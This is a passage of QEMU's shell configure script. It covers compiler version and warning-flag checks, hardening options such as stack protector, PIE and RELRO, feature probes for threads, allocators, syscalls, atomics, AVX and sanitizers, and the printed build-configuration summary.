--extra-ldflags=LDFLAGS append extra linker flags LDFLAGS --cross-cc-ARCH=CC use compiler when building ARCH guest test cases --cross-cc-flags-ARCH= use compiler flags when building ARCH guest tests --make=MAKE use specified make [$make] --install=INSTALL use specified install [$install] --with-git=GIT use specified git [$git] --static enable static build [$static] --docdir=PATH install documentation in PATH$confsuffix --bindir=PATH install binaries in PATH --libdir=PATH install libraries in PATH --libexecdir=PATH install helper binaries in PATH --sysconfdir=PATH install config in PATH$confsuffix --localstatedir=PATH install local state in PATH (set at runtime on win32) --with-confsuffix=SUFFIX suffix for QEMU data inside datadir/libdir/sysconfdir [$confsuffix] --with-pkgversion=VERS use specified string as sub-version of the package --enable-debug enable common debug build options --enable-sanitizers enable default sanitizers --disable-strip disable stripping binaries --disable-werror disable compilation abort on warning --disable-stack-protector disable compiler-provided stack protection --enable-malloc-trim enable libc malloc_trim() for memory optimization --cpu=CPU Build for host CPU [$cpu] --enable-debug-stack-usage track the maximum stack usage of stacks created by qemu_alloc_stack Optional features, enabled with --enable-FEATURE and disabled with --disable-FEATURE, default is enabled if available: pie Position Independent Executables debug-tcg TCG debugging (default is disabled) membarrier membarrier system call (for Linux 4.14+ or Windows) tcmalloc tcmalloc support jemalloc jemalloc support avx2 AVX2 optimization support avx512f AVX512F optimization support NOTE: The object files are built at the place where configure is launched EOF exit 0 fi # Remove old dependency files to make sure that they get properly regenerated rm -f */config-devices.mak.d # Check that the C compiler works. Doing this here before testing # the host CPU ensures that we had a valid CC to autodetect the # $cpu var (and we should bail right here if that's not the case). # It also allows the help message to be printed without a CC. write_c_skeleton; if compile_object ; then : C compiler works ok else error_exit "\"$cc\" either does not exist or does not work" fi if ! compile_prog ; then error_exit "\"$cc\" cannot build an executable (is your linker broken?)" fi # Now we have handled --enable-tcg-interpreter and know we're not just # printing the help message, bail out if the host CPU isn't supported. if test "$ARCH" = "unknown"; then error_exit "Unsupported CPU = $cpu, try --enable-tcg-interpreter" fi # Consult white-list to determine whether to enable werror # by default. Only enable by default for git builds if test -z "$werror" ; then if test -e "$source_path/.git" && \ { test "$linux" = "yes" || test "$mingw32" = "yes"; }; then werror="yes" else werror="no" fi fi if test "$bogus_os" = "yes"; then # Now that we know that we're not printing the help and that # the compiler works (so the results of the check_defines we used # to identify the OS are reliable), if we didn't recognize the # host OS we should stop now. error_exit "Unrecognized host OS (uname -s reports '$(uname -s)')" fi # Check whether the compiler matches our minimum requirements: cat > $TMPC << EOF #if defined(__clang_major__) && defined(__clang_minor__) # ifdef __apple_build_version__ # if __clang_major__ < 5 || (__clang_major__ == 5 && __clang_minor__ < 1) # error You need at least XCode Clang v5.1 to compile QEMU # endif # else # if __clang_major__ < 3 || (__clang_major__ == 3 && __clang_minor__ < 4) # error You need at least Clang v3.4 to compile QEMU # endif # endif #elif defined(__GNUC__) && defined(__GNUC_MINOR__) # if __GNUC__ < 4 || (__GNUC__ == 4 && __GNUC_MINOR__ < 8) # error You need at least GCC v4.8 to compile QEMU # endif #else # error You either need GCC or Clang to compiler QEMU #endif int main (void) { return 0; } EOF if ! compile_prog "" "" ; then error_exit "You need at least GCC v4.8 or Clang v3.4 (or XCode Clang v5.1)" fi gcc_flags="-Wold-style-declaration -Wold-style-definition -Wtype-limits" gcc_flags="-Wformat-security -Wformat-y2k -Winit-self -Wignored-qualifiers $gcc_flags" gcc_flags="-Wno-missing-include-dirs -Wempty-body -Wnested-externs $gcc_flags" gcc_flags="-Wendif-labels -Wno-shift-negative-value $gcc_flags" gcc_flags="-Wno-initializer-overrides -Wexpansion-to-defined $gcc_flags" gcc_flags="-Wno-string-plus-int -Wno-typedef-redefinition $gcc_flags" # Note that we do not add -Werror to gcc_flags here, because that would # enable it for all configure tests. If a configure test failed due # to -Werror this would just silently disable some features, # so it's too error prone. cc_has_warning_flag() { write_c_skeleton; # Use the positive sense of the flag when testing for -Wno-wombat # support (gcc will happily accept the -Wno- form of unknown # warning options). optflag="$(echo $1 | sed -e 's/^-Wno-/-W/')" compile_prog "-Werror $optflag" "" } for flag in $gcc_flags; do if cc_has_warning_flag $flag ; then QEMU_CFLAGS="$QEMU_CFLAGS $flag" fi done if test "$stack_protector" != "no"; then cat > $TMPC << EOF int main(int argc, char *argv[]) { char arr[64], *p = arr, *c = argv[0]; while (*c) { *p++ = *c++; } return 0; } EOF gcc_flags="-fstack-protector-strong -fstack-protector-all" sp_on=0 for flag in $gcc_flags; do # We need to check both a compile and a link, since some compiler # setups fail only on a .c->.o compile and some only at link time if do_cc $QEMU_CFLAGS -Werror $flag -c -o $TMPO $TMPC && compile_prog "-Werror $flag" ""; then QEMU_CFLAGS="$QEMU_CFLAGS $flag" QEMU_LDFLAGS="$QEMU_LDFLAGS $flag" sp_on=1 break fi done if test "$stack_protector" = yes; then if test $sp_on = 0; then error_exit "Stack protector not supported" fi fi fi # Disable -Wmissing-braces on older compilers that warn even for # the "universal" C zero initializer {0}. cat > $TMPC << EOF struct { int a[2]; } x = {0}; EOF if compile_object "-Werror" "" ; then : else QEMU_CFLAGS="$QEMU_CFLAGS -Wno-missing-braces" fi # Unconditional check for compiler __thread support cat > $TMPC << EOF static __thread int tls_var; int main(void) { return tls_var; } EOF if ! compile_prog "-Werror" "" ; then error_exit "Your compiler does not support the __thread specifier for " \ "Thread-Local Storage (TLS). Please upgrade to a version that does." fi cat > $TMPC << EOF #ifdef __linux__ # define THREAD __thread #else # define THREAD #endif static THREAD int tls_var; int main(void) { return tls_var; } EOF if test "$static" = "yes"; then if test "$pie" != "no" && compile_prog "-Werror -fPIE -DPIE" "-static-pie"; then QEMU_CFLAGS="-fPIE -DPIE $QEMU_CFLAGS" QEMU_LDFLAGS="-static-pie $QEMU_LDFLAGS" pie="yes" elif test "$pie" = "yes"; then error_exit "-static-pie not available due to missing toolchain support" else QEMU_LDFLAGS="-static $QEMU_LDFLAGS" pie="no" fi elif test "$pie" = "no"; then QEMU_CFLAGS="$CFLAGS_NOPIE $QEMU_CFLAGS" QEMU_LDFLAGS="$LDFLAGS_NOPIE $QEMU_LDFLAGS" elif compile_prog "-Werror -fPIE -DPIE" "-pie"; then QEMU_CFLAGS="-fPIE -DPIE $QEMU_CFLAGS" QEMU_LDFLAGS="-pie $QEMU_LDFLAGS" pie="yes" elif test "$pie" = "yes"; then error_exit "PIE not available due to missing toolchain support" else echo "Disabling PIE due to missing toolchain support" pie="no" fi # Detect support for PT_GNU_RELRO + DT_BIND_NOW. # The combination is known as "full relro", because .got.plt is read-only too. if compile_prog "" "-Wl,-z,relro -Wl,-z,now" ; then QEMU_LDFLAGS="-Wl,-z,relro -Wl,-z,now $QEMU_LDFLAGS" fi ########################################## # __sync_fetch_and_and requires at least -march=i486. Many toolchains # use i686 as default anyway, but for those that don't, an explicit # specification is necessary if test "$cpu" = "i386"; then cat > $TMPC << EOF static int sfaa(int *ptr) { return __sync_fetch_and_and(ptr, 0); } int main(void) { int val = 42; val = __sync_val_compare_and_swap(&val, 0, 1); sfaa(&val); return val; } EOF if ! compile_prog "" "" ; then QEMU_CFLAGS="-march=i486 $QEMU_CFLAGS" fi fi ######################################### # Solaris specific configure tool chain decisions if test "$solaris" = "yes" ; then if has $install; then : else error_exit "Solaris install program not found. Use --install=/usr/ucb/install or" \ "install fileutils from www.blastwave.org using pkg-get -i fileutils" \ "to get ginstall which is used by default (which lives in /opt/csw/bin)" fi if test "$(path_of $install)" = "/usr/sbin/install" ; then error_exit "Solaris /usr/sbin/install is not an appropriate install program." \ "try ginstall from the GNU fileutils available from www.blastwave.org" \ "using pkg-get -i fileutils, or use --install=/usr/ucb/install" fi if has ar; then : else if test -f /usr/ccs/bin/ar ; then error_exit "No path includes ar" \ "Add /usr/ccs/bin to your path and rerun configure" fi error_exit "No path includes ar" fi fi if test -z "${target_list+xxx}" ; then for target in $default_target_list; do supported_target $target 2>/dev/null && \ target_list="$target_list $target" done target_list="${target_list# }" else target_list=$(echo "$target_list" | sed -e 's/,/ /g') for target in $target_list; do # Check that we recognised the target name; this allows a more # friendly error message than if we let it fall through. case " $default_target_list " in *" $target "*) ;; *) error_exit "Unknown target name '$target'" ;; esac supported_target $target || exit 1 done fi # see if system emulation was really requested case " $target_list " in *"-softmmu "*) softmmu=yes ;; *) softmmu=no ;; esac feature_not_found() { feature=$1 remedy=$2 error_exit "User requested feature $feature" \ "configure was not able to find it." \ "$remedy" } # --- # big/little endian test cat > $TMPC << EOF short big_endian[] = { 0x4269, 0x4765, 0x4e64, 0x4961, 0x4e00, 0, }; short little_endian[] = { 0x694c, 0x7454, 0x654c, 0x6e45, 0x6944, 0x6e41, 0, }; extern int foo(short *, short *); int main(int argc, char *argv[]) { return foo(big_endian, little_endian); } EOF if compile_object ; then if strings -a $TMPO | grep -q BiGeNdIaN ; then bigendian="yes" elif strings -a $TMPO | grep -q LiTtLeEnDiAn ; then bigendian="no" else echo big/little test failed fi else echo big/little test failed fi ########################################## # pkg-config probe if ! has "$pkg_config_exe"; then error_exit "pkg-config binary '$pkg_config_exe' not found" fi ########################################## # pthread probe PTHREADLIBS_LIST="-pthread -lpthread -lpthreadGC2" pthread=no cat > $TMPC << EOF #include <pthread.h> static void *f(void *p) { return NULL; } int main(void) { pthread_t thread; pthread_create(&thread, 0, f, 0); return 0; } EOF if compile_prog "" "" ; then pthread=yes else for pthread_lib in $PTHREADLIBS_LIST; do if compile_prog "" "$pthread_lib" ; then pthread=yes found=no for lib_entry in $LIBS; do if test "$lib_entry" = "$pthread_lib"; then found=yes break fi done if test "$found" = "no"; then LIBS="$pthread_lib $LIBS" fi PTHREAD_LIB="$pthread_lib" break fi done fi if test "$mingw32" != yes && test "$pthread" = no; then error_exit "pthread check failed" \ "Make sure to have the pthread libs and headers installed." fi # check for pthread_setname_np with thread id pthread_setname_np_w_tid=no cat > $TMPC << EOF #include <pthread.h> static void *f(void *p) { return NULL; } int main(void) { pthread_t thread; pthread_create(&thread, 0, f, 0); pthread_setname_np(thread, "QEMU"); return 0; } EOF if compile_prog "" "$pthread_lib" ; then pthread_setname_np_w_tid=yes fi # check for pthread_setname_np without thread id pthread_setname_np_wo_tid=no cat > $TMPC << EOF #include <pthread.h> static void *f(void *p) { pthread_setname_np("QEMU"); } int main(void) { pthread_t thread; pthread_create(&thread, 0, f, 0); return 0; } EOF if compile_prog "" "$pthread_lib" ; then pthread_setname_np_wo_tid=yes fi if test "$tcmalloc" = "yes" && test "$jemalloc" = "yes" ; then echo "ERROR: tcmalloc && jemalloc can't be used at the same time" exit 1 fi # Even if malloc_trim() is available, these non-libc memory allocators # do not support it. if test "$tcmalloc" = "yes" || test "$jemalloc" = "yes" ; then if test "$malloc_trim" = "yes" ; then echo "Disabling malloc_trim with non-libc memory allocator" fi malloc_trim="no" fi ####################################### # malloc_trim if test "$malloc_trim" != "no" ; then cat > $TMPC << EOF #include <malloc.h> int main(void) { malloc_trim(0); return 0; } EOF if compile_prog "" "" ; then malloc_trim="yes" else malloc_trim="no" fi fi ########################################## # tcmalloc probe if test "$tcmalloc" = "yes" ; then cat > $TMPC << EOF #include <stdlib.h> int main(void) { malloc(1); return 0; } EOF if compile_prog "" "-ltcmalloc" ; then LIBS="-ltcmalloc $LIBS" else feature_not_found "tcmalloc" "install gperftools devel" fi fi ########################################## # jemalloc probe if test "$jemalloc" = "yes" ; then cat > $TMPC << EOF #include <stdlib.h> int main(void) { malloc(1); return 0; } EOF if compile_prog "" "-ljemalloc" ; then LIBS="-ljemalloc $LIBS" else feature_not_found "jemalloc" "install jemalloc devel" fi fi ########################################## # signalfd probe signalfd="no" cat > $TMPC << EOF #include <unistd.h> #include <sys/syscall.h> #include <signal.h> int main(void) { return syscall(SYS_signalfd, -1, NULL, _NSIG / 8); } EOF if compile_prog "" "" ; then signalfd=yes fi # check for sync_file_range sync_file_range=no cat > $TMPC << EOF #include <fcntl.h> int main(void) { sync_file_range(0, 0, 0, 0); return 0; } EOF if compile_prog "" "" ; then sync_file_range=yes fi # check for dup3 dup3=no cat > $TMPC << EOF #include <unistd.h> int main(void) { dup3(0, 0, 0); return 0; } EOF if compile_prog "" "" ; then dup3=yes fi # check for prctl(PR_SET_TIMERSLACK , ... ) support prctl_pr_set_timerslack=no cat > $TMPC << EOF #include <sys/prctl.h> int main(void) { prctl(PR_SET_TIMERSLACK, 1, 0, 0, 0); return 0; } EOF if compile_prog "" "" ; then prctl_pr_set_timerslack=yes fi # check for epoll support epoll=no cat > $TMPC << EOF #include <sys/epoll.h> int main(void) { epoll_create(0); return 0; } EOF if compile_prog "" "" ; then epoll=yes fi # clock_adjtime probe clock_adjtime=no cat > $TMPC <<EOF #include <time.h> int main(void) { return clock_adjtime(0, 0); } EOF clock_adjtime=no if compile_prog "" "" ; then clock_adjtime=yes fi # syncfs probe syncfs=no cat > $TMPC <<EOF #include <unistd.h> int main(void) { return syncfs(0); } EOF syncfs=no if compile_prog "" "" ; then syncfs=yes fi # Search for bswap_32 function byteswap_h=no cat > $TMPC << EOF #include <byteswap.h> int main(void) { return bswap_32(0); } EOF if compile_prog "" "" ; then byteswap_h=yes fi # Search for bswap32 function bswap_h=no cat > $TMPC << EOF #include <sys/endian.h> #include <sys/types.h> #include <machine/bswap.h> int main(void) { return bswap32(0); } EOF if compile_prog "" "" ; then bswap_h=yes fi ########################################## # Do we need libm cat > $TMPC << EOF #include <math.h> int main(int argc, char **argv) { return isnan(sin((double)argc)); } EOF if compile_prog "" "" ; then : elif compile_prog "" "-lm" ; then LIBS="-lm $LIBS" else error_exit "libm check failed" fi ########################################## # Do we need librt # uClibc provides 2 versions of clock_gettime(), one with realtime # support and one without. This means that the clock_gettime() don't # need -lrt. We still need it for timer_create() so we check for this # function in addition. cat > $TMPC <<EOF #include <signal.h> #include <time.h> int main(void) { timer_create(CLOCK_REALTIME, NULL, NULL); return clock_gettime(CLOCK_REALTIME, NULL); } EOF if compile_prog "" "" ; then : # we need pthread for static linking. use previous pthread test result elif compile_prog "" "$pthread_lib -lrt" ; then LIBS="$LIBS -lrt" fi # Check whether we need to link libutil for openpty() cat > $TMPC << EOF extern int openpty(int *am, int *as, char *name, void *termp, void *winp); int main(void) { return openpty(0, 0, 0, 0, 0); } EOF if ! compile_prog "" "" ; then if compile_prog "" "-lutil" ; then libs_softmmu="-lutil $libs_softmmu" libs_tools="-lutil $libs_tools" fi fi ########################################## # check if we have madvise madvise=no cat > $TMPC << EOF #include <sys/types.h> #include <sys/mman.h> #include <stddef.h> int main(void) { return madvise(NULL, 0, MADV_DONTNEED); } EOF if compile_prog "" "" ; then madvise=yes fi ########################################## # check if we have posix_madvise posix_madvise=no cat > $TMPC << EOF #include <sys/mman.h> #include <stddef.h> int main(void) { return posix_madvise(NULL, 0, POSIX_MADV_DONTNEED); } EOF if compile_prog "" "" ; then posix_madvise=yes fi ########################################## # check if we have posix_memalign() posix_memalign=no cat > $TMPC << EOF #include <stdlib.h> int main(void) { void *p; return posix_memalign(&p, 8, 8); } EOF if compile_prog "" "" ; then posix_memalign=yes fi ########################################## # check if we have posix_syslog posix_syslog=no cat > $TMPC << EOF #include <syslog.h> int main(void) { openlog("qemu", LOG_PID, LOG_DAEMON); syslog(LOG_INFO, "configure"); return 0; } EOF if compile_prog "" "" ; then posix_syslog=yes fi ########################################## # check if we have sem_timedwait sem_timedwait=no cat > $TMPC << EOF #include <semaphore.h> int main(void) { sem_t s; struct timespec t = {0}; return sem_timedwait(&s, &t); } EOF if compile_prog "" "" ; then sem_timedwait=yes fi ########################################## # check if we have strchrnul strchrnul=no cat > $TMPC << EOF #include <string.h> int main(void); // Use a haystack that the compiler shouldn't be able to constant fold char *haystack = (char*)&main; int main(void) { return strchrnul(haystack, 'x') != &haystack[6]; } EOF if compile_prog "" "" ; then strchrnul=yes fi ######################################### # check if we have st_atim st_atim=no cat > $TMPC << EOF #include <sys/stat.h> #include <stddef.h> int main(void) { return offsetof(struct stat, st_atim); } EOF if compile_prog "" "" ; then st_atim=yes fi ########################################## # check if we have open_by_handle_at open_by_handle_at=no cat > $TMPC << EOF #include <fcntl.h> #if !defined(AT_EMPTY_PATH) # error missing definition #else int main(void) { struct file_handle fh; return open_by_handle_at(0, &fh, 0); } #endif EOF if compile_prog "" "" ; then open_by_handle_at=yes fi ######################################## # check if we have linux/magic.h linux_magic_h=no cat > $TMPC << EOF #include <linux/magic.h> int main(void) { return 0; } EOF if compile_prog "" "" ; then linux_magic_h=yes fi ######################################## # check whether we can disable warning option with a pragma (this is needed # to silence warnings in the headers of some versions of external libraries). # This test has to be compiled with -Werror as otherwise an unknown pragma is # only a warning. # # If we can't selectively disable warning in the code, disable -Werror so that # the build doesn't fail anyway. pragma_disable_unused_but_set=no cat > $TMPC << EOF #pragma GCC diagnostic push #pragma GCC diagnostic ignored "-Wstrict-prototypes" #pragma GCC diagnostic pop int main(void) { return 0; } EOF if compile_prog "-Werror" "" ; then pragma_diagnostic_available=yes else werror=no fi ######################################## # check if environ is declared has_environ=no cat > $TMPC << EOF #include <unistd.h> int main(void) { environ = 0; return 0; } EOF if compile_prog "" "" ; then has_environ=yes fi ######################################## # check if cpuid.h is usable. cat > $TMPC << EOF #include <cpuid.h> int main(void) { unsigned a, b, c, d; int max = __get_cpuid_max(0, 0); if (max >= 1) { __cpuid(1, a, b, c, d); } if (max >= 7) { __cpuid_count(7, 0, a, b, c, d); } return 0; } EOF if compile_prog "" "" ; then cpuid_h=yes fi ########################################## # avx2 optimization requirement check # # There is no point enabling this if cpuid.h is not usable, # since we won't be able to select the new routines. if test "$cpuid_h" = "yes" && test "$avx2_opt" != "no"; then cat > $TMPC << EOF #pragma GCC push_options #pragma GCC target("avx2") #include <cpuid.h> #include <immintrin.h> static int bar(void *a) { __m256i x = *(__m256i *)a; return _mm256_testz_si256(x, x); } int main(int argc, char *argv[]) { return bar(argv[0]); } EOF if compile_object "" ; then avx2_opt="yes" else avx2_opt="no" fi fi ########################################## # avx512f optimization requirement check # # There is no point enabling this if cpuid.h is not usable, # since we won't be able to select the new routines. # by default, it is turned off. # if user explicitly want to enable it, check environment if test "$cpuid_h" = "yes" && test "$avx512f_opt" = "yes"; then cat > $TMPC << EOF #pragma GCC push_options #pragma GCC target("avx512f") #include <cpuid.h> #include <immintrin.h> static int bar(void *a) { __m512i x = *(__m512i *)a; return _mm512_test_epi64_mask(x, x); } int main(int argc, char *argv[]) { return bar(argv[0]); } EOF if ! compile_object "" ; then avx512f_opt="no" fi else avx512f_opt="no" fi ######################################## # check if __[u]int128_t is usable. int128=no cat > $TMPC << EOF __int128_t a; __uint128_t b; int main (void) { a = a + b; b = a * b; a = a * a; return 0; } EOF if compile_prog "" "" ; then int128=yes fi ######################################### # See if 128-bit atomic operations are supported. atomic128=no if test "$int128" = "yes"; then cat > $TMPC << EOF int main(void) { unsigned __int128 x = 0, y = 0; y = __atomic_load_16(&x, 0); __atomic_store_16(&x, y, 0); __atomic_compare_exchange_16(&x, &y, x, 0, 0, 0); return 0; } EOF if compile_prog "" "" ; then atomic128=yes fi fi cmpxchg128=no if test "$int128" = yes && test "$atomic128" = no; then cat > $TMPC << EOF int main(void) { unsigned __int128 x = 0, y = 0; __sync_val_compare_and_swap_16(&x, y, x); return 0; } EOF if compile_prog "" "" ; then cmpxchg128=yes fi fi ######################################### # See if 64-bit atomic operations are supported. # Note that without __atomic builtins, we can only # assume atomic loads/stores max at pointer size. cat > $TMPC << EOF #include <stdint.h> int main(void) { uint64_t x = 0, y = 0; #ifdef __ATOMIC_RELAXED y = __atomic_load_8(&x, 0); __atomic_store_8(&x, y, 0); __atomic_compare_exchange_8(&x, &y, x, 0, 0, 0); __atomic_exchange_8(&x, y, 0); __atomic_fetch_add_8(&x, y, 0); #else typedef char is_host64[sizeof(void *) >= sizeof(uint64_t) ? 1 : -1]; __sync_lock_test_and_set(&x, y); __sync_val_compare_and_swap(&x, y, 0); __sync_fetch_and_add(&x, y); #endif return 0; } EOF if compile_prog "" "" ; then atomic64=yes fi ######################################### # See if --dynamic-list is supported by the linker ld_dynamic_list="no" if test "$static" = "no" ; then cat > $TMPTXT <<EOF { foo; }; EOF cat > $TMPC <<EOF #include <stdio.h> void foo(void); void foo(void) { printf("foo\n"); } int main(void) { foo(); return 0; } EOF if compile_prog "" "-Wl,--dynamic-list=$TMPTXT" ; then ld_dynamic_list="yes" fi fi ######################################### # See if -exported_symbols_list is supported by the linker ld_exported_symbols_list="no" if test "$static" = "no" ; then cat > $TMPTXT <<EOF _foo EOF if compile_prog "" "-Wl,-exported_symbols_list,$TMPTXT" ; then ld_exported_symbols_list="yes" fi fi ######################################## # See if __attribute__((alias)) is supported. # This false for Xcode 9, but has been remedied for Xcode 10. # Unfortunately, travis uses Xcode 9 by default. attralias=no cat > $TMPC << EOF int x = 1; extern const int y __attribute__((alias("x"))); int main(void) { return 0; } EOF if compile_prog "" "" ; then attralias=yes fi ######################################## # check if getauxval is available. getauxval=no cat > $TMPC << EOF #include <sys/auxv.h> int main(void) { return getauxval(AT_HWCAP) == 0; } EOF if compile_prog "" "" ; then getauxval=yes fi ######################################## # check if ccache is interfering with # semantic analysis of macros unset CCACHE_CPP2 ccache_cpp2=no cat > $TMPC << EOF static const int Z = 1; #define fn() ({ Z; }) #define TAUT(X) ((X) == Z) #define PAREN(X, Y) (X == Y) #define ID(X) (X) int main(int argc, char *argv[]) { int x = 0, y = 0; x = ID(x); x = fn(); fn(); if (PAREN(x, y)) return 0; if (TAUT(Z)) return 0; return 0; } EOF if ! compile_object "-Werror"; then ccache_cpp2=yes fi ########################################## # check for usable membarrier system call if test "$membarrier" = "yes"; then have_membarrier=no if test "$mingw32" = "yes" ; then have_membarrier=yes elif test "$linux" = "yes" ; then cat > $TMPC << EOF #include <linux/membarrier.h> #include <sys/syscall.h> #include <unistd.h> #include <stdlib.h> int main(void) { syscall(__NR_membarrier, MEMBARRIER_CMD_QUERY, 0); syscall(__NR_membarrier, MEMBARRIER_CMD_SHARED, 0); exit(0); } EOF if compile_prog "" "" ; then have_membarrier=yes fi fi if test "$have_membarrier" = "no"; then feature_not_found "membarrier" "membarrier system call not available" fi else # Do not enable it by default even for Mingw32, because it doesn't # work on Wine. membarrier=no fi ################################################# # Sparc implicitly links with --relax, which is # incompatible with -r, so --no-relax should be # given. It does no harm to give it on other # platforms too. # Note: the prototype is needed since QEMU_CFLAGS # contains -Wmissing-prototypes cat > $TMPC << EOF extern int foo(void); int foo(void) { return 0; } EOF if ! compile_object ""; then error_exit "Failed to compile object file for LD_REL_FLAGS test" fi for i in '-Wl,-r -Wl,--no-relax' -Wl,-r -r; do if do_cc -nostdlib $i -o $TMPMO $TMPO; then LD_REL_FLAGS=$i break fi done ########################################## # check for sysmacros.h have_sysmacros=no cat > $TMPC << EOF #include <sys/sysmacros.h> int main(void) { return makedev(0, 0); } EOF if compile_prog "" "" ; then have_sysmacros=yes fi ########################################## # check for _Static_assert() have_static_assert=no cat > $TMPC << EOF _Static_assert(1, "success"); int main(void) { return 0; } EOF if compile_prog "" "" ; then have_static_assert=yes fi ########################################## # check for utmpx.h, it is missing e.g. on OpenBSD have_utmpx=no cat > $TMPC << EOF #include <utmpx.h> struct utmpx user_info; int main(void) { return 0; } EOF if compile_prog "" "" ; then have_utmpx=yes fi ########################################## # check for getrandom() have_getrandom=no cat > $TMPC << EOF #include <sys/random.h> int main(void) { return getrandom(0, 0, GRND_NONBLOCK); } EOF if compile_prog "" "" ; then have_getrandom=yes fi ########################################## # checks for sanitizers have_asan=no have_ubsan=no have_asan_iface_h=no have_asan_iface_fiber=no if test "$sanitizers" = "yes" ; then write_c_skeleton if compile_prog "$CPU_CFLAGS -Werror -fsanitize=address" ""; then have_asan=yes fi # we could use a simple skeleton for flags checks, but this also # detect the static linking issue of ubsan, see also: # https://gcc.gnu.org/bugzilla/show_bug.cgi?id=84285 cat > $TMPC << EOF #include <stdlib.h> int main(void) { void *tmp = malloc(10); return *(int *)(tmp + 2); } EOF if compile_prog "$CPU_CFLAGS -Werror -fsanitize=undefined" ""; then have_ubsan=yes fi if check_include "sanitizer/asan_interface.h" ; then have_asan_iface_h=yes fi cat > $TMPC << EOF #include <sanitizer/asan_interface.h> int main(void) { __sanitizer_start_switch_fiber(0, 0, 0); return 0; } EOF if compile_prog "$CPU_CFLAGS -Werror -fsanitize=address" "" ; then have_asan_iface_fiber=yes fi fi ########################################## # check for Apple Silicon JIT function if [ "$darwin" = "yes" ] ; then cat > $TMPC << EOF #include <pthread.h> int main() { pthread_jit_write_protect_np(0); return 0;} EOF if ! compile_prog ""; then have_pthread_jit_protect='no' else have_pthread_jit_protect='yes' fi if test "$have_pthread_jit_protect" = "yes" ; then cat > $TMPC << EOF #include "stdint.h" int main() { uint64_t commpage_sprr = (*(uint64_t*)0xFFFFFC10C); // In Apple Hypervisor, this value is not accessbile and // pthread_jit_write_protect_np essentially is a no-op if (!commpage_sprr) { return 1; } else { return 0; } } EOF if ! compile_prog ""; then have_sprr='no' have_pthread_jit_protect='no' else $TMPE if [ $? -eq 0 ]; then have_sprr='yes' else have_sprr='no' fi fi fi fi ########################################## # End of CC checks # After here, no more $cc or $ld runs write_c_skeleton if test "$have_asan" = "yes"; then QEMU_CFLAGS="-fsanitize=address $QEMU_CFLAGS" QEMU_LDFLAGS="-fsanitize=address $QEMU_LDFLAGS" if test "$have_asan_iface_h" = "no" ; then echo "ASAN build enabled, but ASAN header missing." \ "Without code annotation, the report may be inferior." elif test "$have_asan_iface_fiber" = "no" ; then echo "ASAN build enabled, but ASAN header is too old." \ "Without code annotation, the report may be inferior." fi fi if test "$have_ubsan" = "yes"; then QEMU_CFLAGS="-fsanitize=undefined $QEMU_CFLAGS" QEMU_LDFLAGS="-fsanitize=undefined $QEMU_LDFLAGS" fi # Now we've finished running tests it's OK to add -Werror to the compiler flags if test "$werror" = "yes"; then QEMU_CFLAGS="-Werror $QEMU_CFLAGS" fi if test "$solaris" = "no" ; then if $ld --version 2>/dev/null | grep "GNU ld" >/dev/null 2>/dev/null ; then QEMU_LDFLAGS="-Wl,--warn-common $QEMU_LDFLAGS" fi fi # Use ASLR, no-SEH and DEP if available if test "$mingw32" = "yes" ; then for flag in --dynamicbase --no-seh --nxcompat; do if ld_has $flag ; then QEMU_LDFLAGS="-Wl,$flag $QEMU_LDFLAGS" fi done fi # Disable OpenBSD W^X if available if test "$tcg" = "yes" && test "$targetos" = "OpenBSD"; then cat > $TMPC <<EOF int main(void) { return 0; } EOF wx_ldflags="-Wl,-z,wxneeded" if compile_prog "" "$wx_ldflags"; then QEMU_LDFLAGS="$QEMU_LDFLAGS $wx_ldflags" fi fi qemu_confdir=$sysconfdir$confsuffix qemu_localedir="$datadir/locale" # Check that the C++ compiler exists and works with the C compiler. # All the QEMU_CXXFLAGS are based on QEMU_CFLAGS. Keep this at the end to don't miss any other that could be added. if has $cxx; then cat > $TMPC <<EOF int c_function(void); int main(void) { return c_function(); } EOF compile_object cat > $TMPCXX <<EOF extern "C" { int c_function(void); } int c_function(void) { return 42; } EOF update_cxxflags if do_cxx $QEMU_CXXFLAGS -o $TMPE $TMPCXX $TMPO $QEMU_LDFLAGS; then # C++ compiler $cxx works ok with C compiler $cc : else echo "C++ compiler $cxx does not work with C compiler $cc" echo "Disabling C++ specific optional code" cxx= fi else echo "No C++ compiler available; disabling C++ specific optional code" cxx= fi echo_version() { if test "$1" = "yes" ; then echo "($2)" fi } echo "Install prefix $prefix" echo "binary directory $(eval echo $bindir)" echo "library directory $(eval echo $libdir)" echo "libexec directory $(eval echo $libexecdir)" echo "include directory $(eval echo $includedir)" echo "config directory $(eval echo $sysconfdir)" if test "$mingw32" = "no" ; then echo "local state directory $(eval echo $local_statedir)" echo "ELF interp prefix $interp_prefix" else echo "local state directory queried at runtime" fi echo "Build directory $(pwd)" echo "Source path $source_path" echo "GIT binary $git" echo "GIT submodules $git_submodules" echo "C compiler $cc" echo "Host C compiler $host_cc" echo "C++ compiler $cxx" echo "Objective-C compiler $objcc" echo "ARFLAGS $ARFLAGS" echo "CFLAGS $CFLAGS" echo "QEMU_CFLAGS $QEMU_CFLAGS" echo "QEMU_LDFLAGS $QEMU_LDFLAGS" echo "make $make" echo "install $install" echo "host CPU $cpu" echo "host big endian $bigendian" echo "target list $target_list" echo "strip binaries $strip_opt" echo "static build $static" echo "mingw32 support $mingw32" echo "PIE $pie" echo "TCG support $tcg" echo "malloc trim support $malloc_trim" echo "membarrier $membarrier" echo "madvise $madvise" echo "posix_madvise $posix_madvise" echo "posix_memalign $posix_memalign" echo "debug stack usage $debug_stack_usage" echo "tcmalloc support $tcmalloc" echo "jemalloc support $jemalloc" echo "avx2 optimization $avx2_opt" echo "avx512f optimization $avx512f_opt" if test "$supported_cpu" = "no"; then echo echo "WARNING: SUPPORT FOR THIS HOST CPU WILL GO AWAY IN FUTURE RELEASES!" echo echo "CPU host architecture $cpu support is not currently maintained." echo "The QEMU project intends to remove support for this host CPU in" echo "a future release if nobody volunteers to maintain it and to" echo "provide a build host for our continuous integration setup." echo "configure has succeeded and you can continue to build, but" echo "if you care about QEMU on this platform you should contact" echo "us upstream at qemu-devel@nongnu.org." fi if test "$supported_os" = "no"; then echo echo "WARNING: SUPPORT FOR THIS HOST OS WILL GO AWAY IN FUTURE RELEASES!" echo echo "Host OS $targetos support is not currently maintained." echo "The QEMU project intends to remove support for this host OS in" echo "a future release if nobody volunteers to maintain it and to" echo "provide a build host for our continuous integration setup." echo "configure has succeeded and you can continue to build, but" echo "if you care about QEMU on this platform you should contact" echo "us upstream at qemu-devel@nongnu.org." fi config_host_mak="config-host.mak" echo "# Automatically generated by configure - do not modify" > $config_host_mak echo >> $config_host_mak echo all: >> $config_host_mak echo "prefix=$prefix" >> $config_host_mak echo "bindir=$bindir" >> $config_host_mak 